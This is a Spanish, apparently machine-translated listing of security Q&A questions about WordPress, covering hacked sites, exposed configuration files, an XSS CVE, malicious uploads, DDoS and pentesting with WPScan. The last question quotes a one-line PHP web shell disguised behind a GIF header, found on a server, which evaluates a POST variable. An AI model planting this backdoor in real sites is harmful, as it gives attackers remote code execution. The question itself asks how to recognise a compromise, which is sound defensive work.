Preguntas con etiqueta 'wordpress'

1
respuesta

Visualización de la lista de usuarios registrados en un sitio web

Acabo de empezar a trabajar para una pequeña empresa que tiene un sitio web de Wordpress con cuentas de usuario. Cada cuenta de usuario tiene un nombre de inicio de sesión, un nombre para mostrar, un nombre real, un correo electrónico, una contr...
hecha 02.03.2017 - 18:22
2
respuestas

¿Qué riesgo de seguridad significa si tiene disponibles su contraseña de db y la publicidad de token de seguridad?

En Alemania, todos están preocupados por un partido político prominente que exponga su wp-config al público: enlace *********** r.de/wp-config.php ¿Cuánto de un riesgo de seguridad es eso? La base de datos, por ejemplo, solo es ac...
hecha 23.05.2014 - 17:26
1
respuesta

Determinar cómo se comprometió mi sitio web de Wordpress

Tengo un blog que ejecuta Wordpress. La última vez que visité mi blog me di cuenta de que había sido hackeado. El sitio web redirige a una página de phishing de PayPal, mientras que otros enlaces ofrecen una multa de apertura. Quiero saber cómo...
hecha 15.11.2012 - 01:49
1
respuesta

¿Puede un simple comentario en WordPress dañar mi sistema (CVE-2016-4567)?

¿Qué riesgos están asociados con la vulnerabilidad de WordPress CVE-2016-4567 ?    Vulnerabilidad de secuencias de comandos entre sitios (XSS) en flash / FlashMediaElement.as en MediaElement.js antes de 2.21.0, tal como se usa en WordPress a...
hecha 01.06.2016 - 02:19
2
respuestas

Cómo prevenir la carga de archivos maliciosos a un sitio

Recientemente, un par de sitios que habíamos construido se han utilizado para enviar una tonelada de correos electrónicos no deseados. No somos expertos en seguridad, pero con algunas investigaciones creemos que puede ser algún tipo de Inyección...
hecha 11.08.2016 - 10:56
1
respuesta

¿Cómo proteger un sitio web de DDoS sin un CDN? [cerrado]

Tengo conocimientos básicos de Bash y con ese conocimiento, alquilé una máquina remota en una plataforma de alojamiento principalmente autogestionada (DigitalOcean) y crié un entorno LEMP en el que tengo un sitio web. Yo protejo mi entorno co...
hecha 02.04.2018 - 05:27
1
respuesta

el ataque de malware en mi sitio web puede haber iniciado un servidor SOCKS. Por favor, avise [duplicado]

Un sitio web en el que hago trabajo voluntario fue recientemente uno de los afectados por una vulnerabilidad del complemento de wordpress. Siguiendo los consejos en la respuesta a esta pregunta , que contiene detalles del ataque, espero qu...
hecha 06.01.2015 - 00:29
2
respuestas

Seguridad de url de administración de contenido

Administro un sitio web que es un "imán malo" para nuestros competidores. Estoy utilizando Incapsula CDN + WAF y tengo un proxy interno para el almacenamiento en caché. Por su naturaleza, CMS / WP consume muchos datos, he comprobado que, y e...
hecha 08.02.2015 - 12:32
3
respuestas

Efectivamente, haga un Pentest en un sitio de Wordpress

Cuando se trata de un pentesting de blackbox de un sitio de Wordpress, lo primero que se me ocurre es WPScan [http://wpscan.org/◆ < a>. Mientras puse a prueba algunos sitios, enfrenté un problema común, es decir, muestra que Wordpress SEO 1....
hecha 30.03.2014 - 09:10
3
respuestas

¿Este archivo PHP que contiene una evaluación de una variable POST es una indicación de compromiso?

Encontré este archivo en mi servidor, contiene el siguiente código: GIF89a <?php eval ($_POST[plm12345plm]); ?> No hay otro código al lado de este. ¿Es esto malicioso?     
hecha 04.05.2015 - 23:25